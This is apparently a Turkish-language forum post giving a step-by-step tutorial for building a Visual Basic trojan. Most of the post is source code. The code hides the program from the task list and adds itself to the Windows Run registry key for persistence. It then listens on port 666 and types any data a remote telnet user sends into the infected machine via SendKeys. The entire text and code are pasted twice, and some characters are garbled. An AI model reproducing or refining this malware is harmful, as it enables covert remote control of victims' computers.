ThEBLaCkDeaTH
Banned
Önce trojan hakkında biraz bilgi vereyim. Trojan Windows her çalıştığında çalışıyor.
CTRL+ALT+Del ekranında görünmüyor. Bu trojanı yiyen bilgisyara telnet ile
bağlanabiliniyor.
Bir visual basic projesi başlatın ve forma Microsoft Winsock Kontrolü ekleyin. Ve
aşağıdaki kodları kontrolün bulundu u formun kod editörüne yapıştırın...
Private Sub Form_Load()
App.TaskVisible = False ' Trojan Ctrl + Alt + Del ekranında görünmeyecek
' Buda programı(trojanı windows kayıt defterine ekler ve windows her
' açıldı ında çalışmasını sağlar.
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite
"HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN" & App.EXEName,
App.Path & "" & App.EXEName & ".exe"
Winsock1.LocalPort = "666" ' bu trojanın portun belirtir. İsterseniz de
iştirebilirsiniz.
Winsock1.Listen 'Trojan bağlantıları dinliyor.
Me.Hide
End Sub
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
'Winsock kontrolü kullanılıyor mu bak.
If Winsock1.State <> sckClosed Then Winsock1.Close
Winsock1.Accept requestID 'İstemci bilgisyar ba lantısını kabul et
End Sub
Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal
Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext
As Long, CancelDisplay As Boolean)
'Hata olmuşsa yada ba lantı kaybedilmişse, tekrar dinlemeye geçiliyor
Winsock1.Close
Winsock1.Listen
End Sub
Private Sub Winsock1_Close()
Winsock1.Close
Winsock1.Listen
End Sub
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim data1 As String
Winsock1.GetData data1
DoEvents
SendKeys data1
End Sub
CTRL+ALT+Del ekranında görünmüyor. Bu trojanı yiyen bilgisyara telnet ile
bağlanabiliniyor.
Bir visual basic projesi başlatın ve forma Microsoft Winsock Kontrolü ekleyin. Ve
aşağıdaki kodları kontrolün bulundu u formun kod editörüne yapıştırın...
Private Sub Form_Load()
App.TaskVisible = False ' Trojan Ctrl + Alt + Del ekranında görünmeyecek
' Buda programı(trojanı windows kayıt defterine ekler ve windows her
' açıldı ında çalışmasını sağlar.
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite
"HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN" & App.EXEName,
App.Path & "" & App.EXEName & ".exe"
Winsock1.LocalPort = "666" ' bu trojanın portun belirtir. İsterseniz de
iştirebilirsiniz.
Winsock1.Listen 'Trojan bağlantıları dinliyor.
Me.Hide
End Sub
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
'Winsock kontrolü kullanılıyor mu bak.
If Winsock1.State <> sckClosed Then Winsock1.Close
Winsock1.Accept requestID 'İstemci bilgisyar ba lantısını kabul et
End Sub
Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal
Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext
As Long, CancelDisplay As Boolean)
'Hata olmuşsa yada ba lantı kaybedilmişse, tekrar dinlemeye geçiliyor
Winsock1.Close
Winsock1.Listen
End Sub
Private Sub Winsock1_Close()
Winsock1.Close
Winsock1.Listen
End Sub
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim data1 As String
Winsock1.GetData data1
DoEvents
SendKeys data1
End Sub